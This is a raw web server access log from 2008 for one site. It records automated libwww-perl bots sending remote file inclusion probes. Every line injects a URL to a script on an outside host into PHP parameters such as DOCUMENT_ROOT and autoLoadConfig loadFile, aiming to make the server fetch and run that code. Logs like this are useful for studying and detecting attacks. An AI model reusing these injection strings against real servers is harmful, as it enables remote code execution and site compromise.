160.99.12.231 - - [29/Jul/2008:11:22:15 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:22:18 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:22:28 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.65" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:22:48 -0700] "GET /logs/access.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:22:51 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:22:51 -0700] "GET /logs/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
